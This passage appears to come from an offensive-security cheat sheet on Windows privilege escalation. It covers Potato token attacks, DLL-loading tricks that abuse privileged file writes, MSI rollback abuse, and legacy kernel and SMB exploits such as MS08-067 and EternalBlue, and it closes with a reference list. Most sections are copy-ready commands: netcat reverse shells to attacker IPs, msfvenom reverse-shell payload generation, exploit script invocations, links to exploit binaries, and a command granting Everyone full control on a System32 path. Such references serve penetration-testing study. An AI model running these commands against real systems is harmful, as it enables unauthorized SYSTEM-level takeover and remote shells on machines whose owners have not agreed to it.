   1264 
   1265 3. Execute JuicyPotato to run a privileged command.
   1266 
   1267     ```powershell
   1268     JuicyPotato.exe -l 9999 -p c:\interpub\wwwroot\upload\nc.exe -a "IP PORT -e cmd.exe" -t t -c {B91D5831-B1BD-4608-8198-D72E155020F7}
   1269     JuicyPotato.exe -l 1340 -p C:\users\User\rev.bat -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
   1270     JuicyPotato.exe -l 1337 -p c:\Windows\System32\cmd.exe -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} -a "/c c:\users\User\reverse_shell.exe"
   1271         Testing {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} 1337
   1272         ......
   1273         [+] authresult 0
   1274         {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4};NT AUTHORITY\SYSTEM
   1275         [+] CreateProcessWithTokenW OK
   1276     ```
   1277 
   1278 ### Rogue Potato (Fake OXID Resolver)
   1279 
   1280 * Binary available at [antonioCoco/RoguePotato](https://github.com/antonioCoco/RoguePotato)
   1281 
   1282 ```powershell
   1283 # Network redirector / port forwarder to run on your remote machine, must use port 135 as src port
   1284 socat tcp-listen:135,reuseaddr,fork tcp:10.0.0.3:9999
   1285 
   1286 # RoguePotato without running RogueOxidResolver locally. You should run the RogueOxidResolver.exe on your remote machine. 
   1287 # Use this if you have fw restrictions.
   1288 RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe"
   1289 
   1290 # RoguePotato all in one with RogueOxidResolver running locally on port 9999
   1291 RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" -l 9999
   1292 
   1293 #RoguePotato all in one with RogueOxidResolver running locally on port 9999 and specific clsid and custom pipename
   1294 RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" -l 9999 -c "{6d8ff8e1-730d-11d4-bf42-00b0d0118b56}" -p splintercode
   1295 ```
   1296 
   1297 ### EFSPotato (MS-EFSR EfsRpcOpenFileRaw)
   1298 
   1299 * Binary available at [zcgonvh/EfsPotato](https://github.com/zcgonvh/EfsPotato)
   1300 
   1301 ```powershell
   1302 # .NET 4.x
   1303 csc EfsPotato.cs
   1304 csc /platform:x86 EfsPotato.cs
   1305 
   1306 # .NET 2.0/3.5
   1307 C:\Windows\Microsoft.Net\Framework\V3.5\csc.exe EfsPotato.cs
   1308 C:\Windows\Microsoft.Net\Framework\V3.5\csc.exe /platform:x86 EfsPotato.cs
   1309 ```
   1310 
   1311 ### JuicyPotatoNG
   1312 
   1313 * [antonioCoco/JuicyPotatoNG](https://github.com/antonioCoco/JuicyPotatoNG)
   1314 
   1315 ```powershell
   1316 JuicyPotatoNG.exe -t * -p "C:\Windows\System32\cmd.exe" -a "/c whoami" > C:\juicypotatong.txt
   1317 ```
   1318 
   1319 ### PrintSpoofer (Printer Bug)
   1320 
   1321 > this work if SeImpersonatePrivilege is enabled
   1322 
   1323 * Binary available at [itm4n/PrintSpoofer](https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0)
   1324 
   1325 ```powershell
   1326 # run nc -lnvp 443 then :
   1327 .\PrintSpoofer64.exe -c "C:\Temp\nc64.exe 192.168.45.171 443 -e cmd"
   1328 # without listener
   1329 .\PrintSpoofer64.exe -i -c cmd
   1330 # Via RPD
   1331 .\PrintSpoofer64.exe -d 3 -c "powershell -ep bypass"
   1332 ```
   1333 
   1334 ## EoP - Privileged File Write
   1335 
   1336 ### DiagHub
   1337 
   1338 :warning: Starting with version 1903 and above, DiagHub can no longer be used to load arbitrary DLLs.
   1339 
   1340 The Microsoft Diagnostics Hub Standard Collector Service (DiagHub) is a service that collects trace information and is programmatically exposed via DCOM.
   1341 This DCOM object can be used to load a DLL into a SYSTEM process, provided that this DLL exists in the `C:\Windows\System32` directory.
   1342 
   1343 #### Exploit
   1344 
   1345 1. Create an [evil DLL](https://gist.github.com/xct/3949f3f4f178b1f3427fae7686a2a9c0) e.g: payload.dll and move it into `C:\Windows\System32`
   1346 2. Build [xct/diaghub](https://github.com/xct/diaghub)
   1347 3. `diaghub.exe c:\\ProgramData\\ payload.dll`
   1348 
   1349 The default payload will run `C:\Windows\System32\spool\drivers\color\nc.exe -lvp 2000 -e cmd.exe`
   1350 
   1351 Alternative tools:
   1352 
   1353 * [Accenture/AARO-Bugs/CVE-2020-5825/TrigDiag](https://github.com/Accenture/AARO-Bugs/tree/master/CVE-2020-5825/TrigDiag)
   1354 * [decoder-it/diaghub_exploit](https://github.com/decoder-it/diaghub_exploit)
   1355 
   1356 ### UsoDLLLoader
   1357 
   1358 :warning: 2020-06-06 Update: this trick no longer works on the latest builds of Windows 10 Insider Preview.
   1359 
   1360 > An alternative to the DiagHub DLL loading "exploit" found by James Forshaw (a.k.a. @tiraniddo)
   1361 
   1362 If we found a privileged file write vulnerability in Windows or in some third-party software, we could copy our own version of `windowscoredeviceinfo.dll` into `C:\Windows\Sytem32\` and then have it loaded by the USO service to get arbitrary code execution as **NT AUTHORITY\System**.
   1363 
   1364 #### Exploit
   1365 
   1366 1. Build [itm4n/UsoDllLoader](https://github.com/itm4n/UsoDllLoader)
   1367     * Select Release config and x64 architecure.
   1368     * Build solution.
   1369         * DLL .\x64\Release\WindowsCoreDeviceInfo.dll
   1370         * Loader .\x64\Release\UsoDllLoader.exe.
   1371 2. Copy `WindowsCoreDeviceInfo.dll` to `C:\Windows\System32\`
   1372 3. Use the loader and wait for the shell or run `usoclient StartInteractiveScan` and connect to the bind shell on port 1337.
   1373 
   1374 ### WerTrigger
   1375 
   1376 > Exploit Privileged File Writes bugs with Windows Problem Reporting
   1377 
   1378 1. Clone [sailay1996/WerTrigger](https://github.com/sailay1996/WerTrigger)
   1379 2. Copy `phoneinfo.dll` to `C:\Windows\System32\`
   1380 3. Place `Report.wer` file and `WerTrigger.exe` in a same directory.
   1381 4. Then, run `WerTrigger.exe`.
   1382 5. Enjoy a shell as **NT AUTHORITY\SYSTEM**
   1383 
   1384 ### WerMgr
   1385 
   1386 > Exploit Privileged Directory Creation Bugs with Windows Error Reporting
   1387 
   1388 1. Clone [binderlabs/DirCreate2System](https://github.com/binderlabs/DirCreate2System)
   1389 2. Create directory `C:\Windows\System32\wermgr.exe.local\`
   1390 3. Grant access to it: `cacls C:\Windows\System32\wermgr.exe.local /e /g everyone:f`
   1391 4. Place `spawn.dll` file and `dircreate2system.exe` in a same directory and run `.\dircreate2system.exe`.
   1392 5. Enjoy a shell as **NT AUTHORITY\SYSTEM**
   1393 
   1394 ## EoP - Privileged File Delete
   1395 
   1396 During an MSI installation, the Windows Installer service maintains a record of every changes in case it needs to be rolled back, to do that it will create:
   1397 
   1398 * a folder at `C:\Config.Msi` containing
   1399     * a rollback script (`.rbs`)
   1400     * a rollback file (`.rbf`)
   1401 
   1402 To convert a privileged file delete to a local privilege escalation, you need to abuse the Windows Installer service.
   1403 
   1404 * delete the protected `C:\Config.Msi` folder immediately after it's created by the Windows Installer
   1405 * recreate the `C:\Config.Msi` folder with weak DACL permissions since ordinary users are allowed to create folders at the root of `C:\`.
   1406 * drop malicious `.rbs` and `.rbf` files into it to be executed by the MSI rollback
   1407 * then upon rollback, Windows Installer will make arbitrary changes to the system
   1408 
   1409 The easiest way to trigger this chain is using [thezdi/FilesystemEoPs/FolderOrFileDeleteToSystem](https://github.com/thezdi/PoC/tree/master/FilesystemEoPs/FolderOrFileDeleteToSystem).
   1410 The exploit contains a .msi file with 2 actions, the first one produces a delay and the second throws an error to make it rollback. This rollback will "restore" a malicious HID.dll in `C:\Program Files\Common Files\microsoft shared\ink\HID.dll`.
   1411 
   1412 Then switch to the secure desktop using `[CTRL]+[ALT]+[DELETE]` and open the On-Screen Keyboard (`osk.exe`).
   1413 The `osk.exe` process first looks for the `C:\Program Files\Common Files\microsoft shared\ink\HID.dll` library instead of `C:\Windows\System32\HID.dll`
   1414 
   1415 ## EoP - Common Vulnerabilities and Exposure
   1416 
   1417 ### MS08-067 (NetAPI)
   1418 
   1419 Check the vulnerability with the following nmap script.
   1420 
   1421 ```c
   1422 nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms08-067 <ip_netblock>
   1423 ```
   1424 
   1425 Metasploit modules to exploit `MS08-067 NetAPI`.
   1426 
   1427 ```powershell
   1428 exploit/windows/smb/ms08_067_netapi
   1429 ```
   1430 
   1431 If you can't use Metasploit and only want a reverse shell.
   1432 
   1433 ```powershell
   1434 https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py
   1435 msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows
   1436 
   1437 Example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445
   1438 Example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used)
   1439 Example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal
   1440 Example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English
   1441 Example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX)
   1442 Example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX)
   1443 Example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX)
   1444 python ms08-067.py 10.0.0.1 6 445
   1445 ```
   1446 
   1447 ### MS10-015 (KiTrap0D) - Microsoft Windows NT/2000/2003/2008/XP/Vista/7
   1448 
   1449 'KiTrap0D' User Mode to Ring Escalation (MS10-015)
   1450 
   1451 ```powershell
   1452 https://www.exploit-db.com/exploits/11199
   1453 
   1454 Metasploit : exploit/windows/local/ms10_015_kitrap0d
   1455 ```
   1456 
   1457 ### MS11-080 (afd.sys) - Microsoft Windows XP/2003
   1458 
   1459 ```powershell
   1460 Python: https://www.exploit-db.com/exploits/18176
   1461 Metasploit: exploit/windows/local/ms11_080_afdjoinleaf
   1462 ```
   1463 
   1464 ### MS15-051 (Client Copy Image) - Microsoft Windows 2003/2008/7/8/2012
   1465 
   1466 ```powershell
   1467 printf("[#] usage: ms15-051 command \n");
   1468 printf("[#] eg: ms15-051 \"whoami /all\" \n");
   1469 
   1470 # x32
   1471 https://github.com/rootphantomer/exp/raw/master/ms15-051%EF%BC%88%E4%BF%AE%E6%94%B9%E7%89%88%EF%BC%89/ms15-051/ms15-051/Win32/ms15-051.exe
   1472 
   1473 # x64
   1474 https://github.com/rootphantomer/exp/raw/master/ms15-051%EF%BC%88%E4%BF%AE%E6%94%B9%E7%89%88%EF%BC%89/ms15-051/ms15-051/x64/ms15-051.exe
   1475 
   1476 https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS15-051
   1477 use exploit/windows/local/ms15_051_client_copy_image
   1478 ```
   1479 
   1480 ### MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
   1481 
   1482 Check if the patch is installed : `wmic qfe list | findstr "3139914"`
   1483 
   1484 ```powershell
   1485 Powershell:
   1486 https://www.exploit-db.com/exploits/39719/
   1487 https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1
   1488 
   1489 Binary exe : https://github.com/Meatballs1/ms16-032
   1490 
   1491 Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc
   1492 ```
   1493 
   1494 ### MS17-010 (Eternal Blue)
   1495 
   1496 Check the vulnerability with the following nmap script or netexec: `netexec smb 10.10.10.10 -u '' -p '' -d domain -M ms17-010`.
   1497 
   1498 ```c
   1499 nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17–010 <ip_netblock>
   1500 ```
   1501 
   1502 Metasploit modules to exploit `EternalRomance/EternalSynergy/EternalChampion`.
   1503 
   1504 ```powershell
   1505 auxiliary/admin/smb/ms17_010_command          MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1506 auxiliary/scanner/smb/smb_ms17_010            MS17-010 SMB RCE Detection
   1507 exploit/windows/smb/ms17_010_eternalblue      MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1508 exploit/windows/smb/ms17_010_eternalblue_win8 MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   1509 exploit/windows/smb/ms17_010_psexec           MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   1510 ```
   1511 
   1512 If you can't use Metasploit and only want a reverse shell.
   1513 
   1514 ```powershell
   1515 git clone https://github.com/helviojunior/MS17-010
   1516 
   1517 # generate a simple reverse shell to use
   1518 msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o revshell.exe
   1519 python2 send_and_execute.py 10.0.0.1 revshell.exe
   1520 ```
   1521 
   1522 ### CVE-2019-1388
   1523 
   1524 Exploit : [packetstormsecurity/hhupd.exe](https://packetstormsecurity.com/files/14437/hhupd.exe.html)
   1525 
   1526 Requirement:
   1527 
   1528 * Windows 7
   1529 * Windows 10 LTSC 10240
   1530 
   1531 Failing on :
   1532 
   1533 * LTSC 2019
   1534 * 1709
   1535 * 1803
   1536 
   1537 Detailed information about the vulnerability : [Thanksgiving Treat: Easy-as-Pie Windows 7 Secure Desktop Escalation of Privilege - Simon Zuckerbraun - November 19, 2019](https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege)
   1538 
   1539 ## References
   1540 
   1541 * [ABUSING ARBITRARY FILE DELETES TO ESCALATE PRIVILEGE AND OTHER GREAT TRICKS - Simon Zuckerbraun - March 17, 2022](https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks)
   1542 * [Abusing Diaghub - xct - March 7, 2019](https://vulndev.io/2019/03/06/abusing-diaghub/)
   1543 * [Abusing SeLoadDriverPrivilege for privilege escalation - June 14, 2018 - OSCAR MALLO](https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/)
   1544 * [Abusing the SeRelabelPrivilege - @decoder_it - May 30, 2024](https://decoder.cloud/2024/05/30/abusing-the-serelabelprivilege/)
   1545 * [Alternative methods of becoming SYSTEM - Adam Chester @_xpn_ - November 20, 2017](https://blog.xpnsec.com/becoming-system/)
   1546 * [Basic Linux Privilege Escalation - g0tmi1k - August 2, 2011](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
   1547 * [Bypassing AppLocker by abusing HashInfo - Ian - August 19, 2022](https://shells.systems/post-bypassing-applocker-by-abusing-hashinfo/)
   1548 * [Chapter 4 - Windows Post-Exploitation - dostoevskylabs - November 2, 2017](https://github.com/dostoevskylabs/dostoevsky-pentest-notes/blob/master/chapter-4.md)
   1549 * [Common Windows Misconfiguration: Services - 2018-09-23 - @am0nsec](https://web.archive.org/web/20191105182846/https://amonsec.net/2018/09/23/Common-Windows-Misconfiguration-Services.html)
   1550 * [Deleting Your Way Into SYSTEM: Why Arbitrary File Deletion Vulnerabilities Matter - ANDREW OLIVEAU - SEP 11, 2023](https://www.mandiant.com/resources/blog/arbitrary-file-deletion-vulnerabilities)
   1551 * [Escalating Privileges via Third-Party Windows Installers - ANDREW OLIVEAU - JUL 19, 2023](https://www.mandiant.com/resources/blog/privileges-third-party-windows-installers)
   1552 * [Giving JuicyPotato a second chance: JuicyPotatoNG - @decoder_it, @splinter_code](https://decoder.cloud/2022/09/21/giving-juicypotato-a-second-chance-juicypotatong/)
   1553 * [Hacking Trick: Environment Variable $Path Interception y Escaladas de Privilegios para Windows](https://www.elladodelmal.com/2020/03/hacking-trick-environment-variable-path.html?m=1)
   1554 * [icacls - Docs Microsoft](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/icacls)
   1555 * [IN THE POTATO FAMILY, I WANT THEM ALL - @BlWasp_](https://hideandsec.sh/books/windows-sNL/page/in-the-potato-family-i-want-them-all)
   1556 * [Living Off The Land Binaries and Scripts (and now also Libraries)](https://github.com/LOLBAS-Project/LOLBAS)
   1557 * [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf)
   1558 * [MSI Shenanigans. Part 1 – Offensive Capabilities Overview - DECEMBER 8, 2022 - Mariusz Banach](https://mgeeky.tech/msi-shenanigans-part-1/)
   1559 * [MSIFortune - LPE with MSI Installers - Oct 3, 2023 - PfiatDe](https://badoption.eu/blog/2023/10/03/MSIFortune.html)
   1560 * [Pentestlab.blog - WPE-01 - Stored Credentials](https://pentestlab.blog/2017/04/19/stored-credentials/)
   1561 * [Pentestlab.blog - WPE-02 - Windows Kernel](https://pentestlab.blog/2017/04/24/windows-kernel-exploits/)
   1562 * [Pentestlab.blog - WPE-03 - DLL Injection](https://pentestlab.blog/2017/04/04/dll-injection/)
   1563 * [Pentestlab.blog - WPE-04 - Weak Service Permissions](https://pentestlab.blog/2017/03/30/weak-service-permissions/)
   1564 * [Pentestlab.blog - WPE-05 - DLL Hijacking](https://pentestlab.blog/2017/03/27/dll-hijacking/)
   1565 * [Pentestlab.blog - WPE-06 - Hot Potato](https://pentestlab.blog/2017/04/13/hot-potato/)
   1566 * [Pentestlab.blog - WPE-07 - Group Policy Preferences](https://pentestlab.blog/2017/03/20/group-policy-preferences/)
   1567 * [Pentestlab.blog - WPE-08 - Unquoted Service Path](https://pentestlab.blog/2017/03/09/unquoted-service-path/)
   1568 * [Pentestlab.blog - WPE-09 - Always Install Elevated](https://pentestlab.blog/2017/02/28/always-install-elevated/)
   1569 * [Pentestlab.blog - WPE-10 - Token Manipulation](https://pentestlab.blog/2017/04/03/token-manipulation/)
   1570 * [Pentestlab.blog - WPE-11 - Secondary Logon Handle](https://pentestlab.blog/2017/04/07/secondary-logon-handle/)
   1571 * [Pentestlab.blog - WPE-12 - Insecure Registry Permissions](https://pentestlab.blog/2017/03/31/insecure-registry-permissions/)
   1572 * [Pentestlab.blog - WPE-13 - Intel SYSRET](https://pentestlab.blog/2017/06/14/intel-sysret/)
   1573 * [Potatoes - Windows Privilege Escalation - Jorge Lajara - November 22, 2020](https://jlajara.gitlab.io/Potatoes_Windows_Privesc)
   1574 * [Privilege Escalation Windows - Philip Linghammar](https://web.archive.org/web/20191231011305/https://xapax.gitbooks.io/security/content/privilege_escalation_windows.html)
   1575 * [Remediation for Microsoft Windows Unquoted Service Path Enumeration Vulnerability - September 18th, 2016 - Robert Russell](https://www.tecklyfe.com/remediation-microsoft-windows-unquoted-service-path-enumeration-vulnerability/)
   1576 * [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/)
   1577 * [The SYSTEM Challenge](https://decoder.cloud/2017/02/21/the-system-challenge/)
   1578 * [TOP–10 ways to boost your privileges in Windows systems - hackmag](https://hackmag.com/security/elevating-privileges-to-administrative-and-further/)
   1579 * [Universal Privilege Escalation and Persistence – Printer - AUGUST 2, 2021)](https://pentestlab.blog/2021/08/02/universal-privilege-escalation-and-persistence-printer/)
   1580 * [Weaponizing Privileged File Writes with the USO Service - Part 2/2 - itm4n - August 19, 2019](https://itm4n.github.io/usodllloader-part2/)
   1581 * [Webinar - Windows Client Privilege Escalation - Oddvar Moe - March 26, 2025](https://www.youtube.com/watch?v=EG2Mbw2DVnU)
   1582 * [Windows Client Privilege Escalation-Shared.pptx - Oddvar Moe - March 27, 2025](https://fr.slideshare.net/slideshow/windows-client-privilege-escalation-shared-pptx/277239036)
   1583 * [Windows elevation of privileges - Guifre Ruiz](https://guif.re/windowseop)
   1584 * [Windows Exploitation Tricks: Exploiting Arbitrary File Writes for Local Elevation of Privilege - James Forshaw, Project Zero - Wednesday, April 18, 2018](https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html)
   1585 * [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html)
   1586 * [Windows Privilege Escalation Guide - absolomb's security blog](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)